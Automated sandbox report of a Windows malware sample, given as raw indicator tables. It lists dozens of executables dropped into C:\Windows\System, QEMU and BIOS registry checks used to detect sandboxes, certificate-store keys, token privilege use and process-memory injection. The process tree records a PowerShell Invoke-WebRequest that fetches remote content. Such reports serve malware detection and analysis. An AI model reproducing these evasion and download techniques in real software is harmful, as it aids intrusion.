File created	C:\Windows\System\taTljmL.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\ejRJDtj.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\NtPsrnq.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\asxvqHg.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\kcypUTj.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\FyfJymr.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\ZeKvClB.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\CQycHkR.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\PYThtvq.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\OgbBBpt.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\pokUqjS.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\oLDJCWH.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\aQGfKwj.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\CWakoOc.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\ZudRRyr.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\xKaaiCu.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\GGJpEbT.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\hRYzBVu.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\lcmnScj.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\aQaXQce.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\BryYmUh.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\tnOqiQu.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\OgfmQOv.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\kTtWCOc.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\FrSwQHT.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\JDspFwU.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\YFtGnYo.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\ARecuon.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\ZCpTLbj.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\tPWSeof.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\MMnafFA.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\ailqYjG.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\bWeHiwC.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\kUAOgER.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\BHHQEzg.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\nUIoukQ.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\QxcRwKi.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\vYbjqoK.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\pucSqim.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\RJKHosB.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\HKDzZET.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\Iyrfffq.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\IMgfcbN.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\HlYlRQE.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\qxGVPvc.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\UmtAAcd.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\mZwtqcc.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\RpUCouu.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\loobypN.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\oyBGdeV.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\aErfYLB.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\hJFSMmA.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\nGyalYK.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\BocRVuX.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_QEMU&PROD_HARDDISK\4&215468A5&0&000000	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	Process not Found

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Process not Found

Modifies data under HKEY_USERS 36 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	Process not Found

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
4120	powershell.exe
4120	powershell.exe
4120	powershell.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
Token: SeDebugPrivilege	4120	powershell.exe
Token: SeLockMemoryPrivilege	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
Token: SeCreateGlobalPrivilege	16820	Process not Found
Token: SeChangeNotifyPrivilege	16820	Process not Found
Token: 33	16820	Process not Found
Token: SeIncBasePriorityPrivilege	16820	Process not Found
Token: SeCreateGlobalPrivilege	17000	Process not Found
Token: SeChangeNotifyPrivilege	17000	Process not Found
Token: 33	17000	Process not Found
Token: SeIncBasePriorityPrivilege	17000	Process not Found
Token: SeCreateGlobalPrivilege	5960	Process not Found
Token: SeChangeNotifyPrivilege	5960	Process not Found
Token: 33	5960	Process not Found
Token: SeIncBasePriorityPrivilege	5960	Process not Found
Token: SeCreateGlobalPrivilege	17380	Process not Found
Token: SeChangeNotifyPrivilege	17380	Process not Found
Token: 33	17380	Process not Found
Token: SeIncBasePriorityPrivilege	17380	Process not Found
Token: SeCreateGlobalPrivilege	15252	Process not Found
Token: SeChangeNotifyPrivilege	15252	Process not Found
Token: 33	15252	Process not Found
Token: SeIncBasePriorityPrivilege	15252	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1980 wrote to memory of 4120	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	96
PID 1980 wrote to memory of 4120	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	96
PID 1980 wrote to memory of 4308	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	97
PID 1980 wrote to memory of 4308	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	97
PID 1980 wrote to memory of 520	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	98
PID 1980 wrote to memory of 520	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	98
PID 1980 wrote to memory of 4792	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	99
PID 1980 wrote to memory of 4792	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	99
PID 1980 wrote to memory of 3824	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	100
PID 1980 wrote to memory of 3824	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	100
PID 1980 wrote to memory of 2240	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	101
PID 1980 wrote to memory of 2240	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	101
PID 1980 wrote to memory of 1668	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	102
PID 1980 wrote to memory of 1668	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	102
PID 1980 wrote to memory of 4380	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	103
PID 1980 wrote to memory of 4380	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	103
PID 1980 wrote to memory of 764	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	104
PID 1980 wrote to memory of 764	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	104
PID 1980 wrote to memory of 2248	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	105
PID 1980 wrote to memory of 2248	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	105
PID 1980 wrote to memory of 4952	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	106
PID 1980 wrote to memory of 4952	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	106
PID 1980 wrote to memory of 4316	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	107
PID 1980 wrote to memory of 4316	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	107
PID 1980 wrote to memory of 2020	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	108
PID 1980 wrote to memory of 2020	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	108
PID 1980 wrote to memory of 1360	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	109
PID 1980 wrote to memory of 1360	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	109
PID 1980 wrote to memory of 4264	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	110
PID 1980 wrote to memory of 4264	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	110
PID 1980 wrote to memory of 3332	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	111
PID 1980 wrote to memory of 3332	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	111
PID 1980 wrote to memory of 2960	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	112
PID 1980 wrote to memory of 2960	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	112
PID 1980 wrote to memory of 2856	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	113
PID 1980 wrote to memory of 2856	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	113
PID 1980 wrote to memory of 2448	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	114
PID 1980 wrote to memory of 2448	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	114
PID 1980 wrote to memory of 1228	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	115
PID 1980 wrote to memory of 1228	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	115
PID 1980 wrote to memory of 2672	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	116
PID 1980 wrote to memory of 2672	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	116
PID 1980 wrote to memory of 2096	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	117
PID 1980 wrote to memory of 2096	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	117
PID 1980 wrote to memory of 4408	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	118
PID 1980 wrote to memory of 4408	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	118
PID 1980 wrote to memory of 1972	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	119
PID 1980 wrote to memory of 1972	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	119
PID 1980 wrote to memory of 3084	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	120
PID 1980 wrote to memory of 3084	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	120
PID 1980 wrote to memory of 4776	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	121
PID 1980 wrote to memory of 4776	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	121
PID 1980 wrote to memory of 3456	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	122
PID 1980 wrote to memory of 3456	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	122
PID 1980 wrote to memory of 3892	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	123
PID 1980 wrote to memory of 3892	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	123
PID 1980 wrote to memory of 3212	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	124
PID 1980 wrote to memory of 3212	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	124
PID 1980 wrote to memory of 5060	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	125
PID 1980 wrote to memory of 5060	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	125
PID 1980 wrote to memory of 2984	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	126
PID 1980 wrote to memory of 2984	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	126
PID 1980 wrote to memory of 4436	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	127
PID 1980 wrote to memory of 4436	1980	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe	127

C:\Users\Admin\AppData\Local\Temp\2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
"C:\Users\Admin\AppData\Local\Temp\2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1980
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4120
- - C:\Windows\system32\wermgr.exe
    "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4120" "2760" "1128" "2844" "0" "0" "2848" "0" "0" "0" "0" "0"
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:9784
- C:\Windows\System\VQhzYLU.exe
  C:\Windows\System\VQhzYLU.exe
  2⤵
  - Executes dropped EXE
  PID:4308
- C:\Windows\System\MIxuEeZ.exe
  C:\Windows\System\MIxuEeZ.exe
  2⤵
  - Executes dropped EXE
  PID:520
- C:\Windows\System\qOxHGRl.exe
  C:\Windows\System\qOxHGRl.exe
  2⤵
  - Executes dropped EXE
  PID:4792
- C:\Windows\System\AHKWICO.exe
  C:\Windows\System\AHKWICO.exe
  2⤵
  - Executes dropped EXE
  PID:3824
- C:\Windows\System\EgekirA.exe
  C:\Windows\System\EgekirA.exe
  2⤵
  - Executes dropped EXE
  PID:2240
- C:\Windows\System\xglSaKX.exe
  C:\Windows\System\xglSaKX.exe
  2⤵
  - Executes dropped EXE
  PID:1668
- C:\Windows\System\jKtNRzz.exe
  C:\Windows\System\jKtNRzz.exe
  2⤵
  - Executes dropped EXE
  PID:4380
- C:\Windows\System\faeiEJO.exe
  C:\Windows\System\faeiEJO.exe
  2⤵
  - Executes dropped EXE
  PID:764
- C:\Windows\System\BryYmUh.exe
  C:\Windows\System\BryYmUh.exe
  2⤵
  - Executes dropped EXE
  PID:2248
- C:\Windows\System\NptZxSx.exe
  C:\Windows\System\NptZxSx.exe
  2⤵
  - Executes dropped EXE
  PID:4952
- C:\Windows\System\pTUwNVA.exe
  C:\Windows\System\pTUwNVA.exe
  2⤵
  - Executes dropped EXE
  PID:4316
- C:\Windows\System\THlDxVF.exe
  C:\Windows\System\THlDxVF.exe
  2⤵
  - Executes dropped EXE
  PID:2020
- C:\Windows\System\BZGElAe.exe
  C:\Windows\System\BZGElAe.exe
  2⤵
  - Executes dropped EXE
  PID:1360
- C:\Windows\System\odFyyPt.exe
  C:\Windows\System\odFyyPt.exe
  2⤵
  - Executes dropped EXE
  PID:4264
- C:\Windows\System\DZaunJn.exe
  C:\Windows\System\DZaunJn.exe
  2⤵
  - Executes dropped EXE
  PID:3332
- C:\Windows\System\demwdMM.exe
  C:\Windows\System\demwdMM.exe
  2⤵
  - Executes dropped EXE
  PID:2960
- C:\Windows\System\AElvxZK.exe
  C:\Windows\System\AElvxZK.exe
  2⤵
  - Executes dropped EXE
  PID:2856
- C:\Windows\System\belcULm.exe
  C:\Windows\System\belcULm.exe
  2⤵
  - Executes dropped EXE
  PID:2448
- C:\Windows\System\xuJRpOC.exe
  C:\Windows\System\xuJRpOC.exe
  2⤵
  - Executes dropped EXE
  PID:1228
- C:\Windows\System\yZymcXo.exe
  C:\Windows\System\yZymcXo.exe
  2⤵
  - Executes dropped EXE
  PID:2672
- C:\Windows\System\zHnaEgZ.exe
  C:\Windows\System\zHnaEgZ.exe
  2⤵
  - Executes dropped EXE
  PID:2096
- C:\Windows\System\stHVgUF.exe
  C:\Windows\System\stHVgUF.exe
  2⤵
  - Executes dropped EXE
  PID:4408
- C:\Windows\System\LzrhaJg.exe
  C:\Windows\System\LzrhaJg.exe
  2⤵
  - Executes dropped EXE
  PID:1972
- C:\Windows\System\fiTcALc.exe
  C:\Windows\System\fiTcALc.exe
  2⤵
  - Executes dropped EXE
  PID:3084
- C:\Windows\System\Psprwij.exe
  C:\Windows\System\Psprwij.exe
  2⤵
  - Executes dropped EXE
  PID:4776
- C:\Windows\System\ebJyWAN.exe
  C:\Windows\System\ebJyWAN.exe
  2⤵
  - Executes dropped EXE
  PID:3456
- C:\Windows\System\DEMSaRF.exe
  C:\Windows\System\DEMSaRF.exe
  2⤵
  - Executes dropped EXE
  PID:3892
- C:\Windows\System\hTViGSj.exe
  C:\Windows\System\hTViGSj.exe
  2⤵
  - Executes dropped EXE
  PID:3212
- C:\Windows\System\soaaCPH.exe
  C:\Windows\System\soaaCPH.exe
  2⤵
  - Executes dropped EXE
  PID:5060
- C:\Windows\System\Pulfaqj.exe
  C:\Windows\System\Pulfaqj.exe
  2⤵
  - Executes dropped EXE
  PID:2984
- C:\Windows\System\iItOukT.exe
  C:\Windows\System\iItOukT.exe
  2⤵
  - Executes dropped EXE
  PID:4436
- C:\Windows\System\ClrqzoO.exe
  C:\Windows\System\ClrqzoO.exe
  2⤵
  - Executes dropped EXE
  PID:4372
- C:\Windows\System\UkTeaTL.exe
  C:\Windows\System\UkTeaTL.exe
  2⤵
  - Executes dropped EXE
  PID:1116
- C:\Windows\System\WxgWerp.exe
  C:\Windows\System\WxgWerp.exe
  2⤵
  - Executes dropped EXE
  PID:4036
- C:\Windows\System\qfSGFZY.exe
  C:\Windows\System\qfSGFZY.exe
  2⤵
  - Executes dropped EXE
  PID:4904
- C:\Windows\System\YEnEcMY.exe
  C:\Windows\System\YEnEcMY.exe
  2⤵
  - Executes dropped EXE
  PID:3644
- C:\Windows\System\XRUFcrZ.exe
  C:\Windows\System\XRUFcrZ.exe
  2⤵
  - Executes dropped EXE
  PID:5144
- C:\Windows\System\iUyCkeN.exe
  C:\Windows\System\iUyCkeN.exe
  2⤵
  - Executes dropped EXE
  PID:5176
- C:\Windows\System\CVLPPEZ.exe
  C:\Windows\System\CVLPPEZ.exe
  2⤵
  - Executes dropped EXE
  PID:5208
- C:\Windows\System\mZwtqcc.exe
  C:\Windows\System\mZwtqcc.exe
  2⤵
  - Executes dropped EXE
  PID:5240
- C:\Windows\System\JibOGuN.exe
  C:\Windows\System\JibOGuN.exe
  2⤵
  - Executes dropped EXE
  PID:5272
- C:\Windows\System\VnpBUHn.exe
  C:\Windows\System\VnpBUHn.exe
  2⤵
  - Executes dropped EXE
  PID:5300
- C:\Windows\System\csqlyvw.exe
  C:\Windows\System\csqlyvw.exe
  2⤵
  - Executes dropped EXE
  PID:5332
- C:\Windows\System\gZfdICr.exe
